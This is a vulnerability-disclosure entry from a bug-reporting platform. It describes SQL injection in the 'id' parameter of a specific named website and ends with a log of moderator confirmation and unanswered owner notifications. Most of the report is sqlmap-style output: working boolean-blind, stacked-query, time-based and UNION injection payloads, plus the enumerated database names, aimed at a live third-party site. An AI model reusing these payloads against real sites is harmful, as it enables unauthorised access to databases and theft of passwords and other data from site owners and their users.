Detailed information
Have SQL injection on site.
By using this weakness possible Steal sensitive information from the site (Passwords, site structure, etc.)
site: ambiancemed.com
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7 AND 9525=9525
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=7;SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=7 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-6345 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767071,0x68644a6f727a6a4f624959496e595a767646416e6f47615864685351415061656f6f784d55455870,0x716b626271),NULL,NULL-- lBeb
---
available databases [2]:
[*] apteyfpx_amqiance
[*] information_wchema
Comments
-
23 January 2017, 13:14
Vulnerability status
Have not any information from source -
13 December 2016, 12:04
Vulnerability status
Sended e-mail to source about vulnerability -
13 December 2016, 11:15
Vulnerability status
Confirmed by Moderator -
13 December 2016, 11:01
Vulnerability status
Sended e-mail to source about vulnerability -
11 December 2016, 11:22
Added point to Vulnerability
Moderator gave 8 point from 10 to vulnerability -
11 December 2016, 11:10
Vulnerability status
Confirmed by Moderator -
08 December 2016, 16:25
Vulnerability changed
Vulnerability "SQL Injection" changed -
08 December 2016, 12:17
Vulnerability cancelled
Saytın ünvanını qeyd edin -
07 December 2016, 23:18
Vulnerability added
Vulnerability added to BUGemot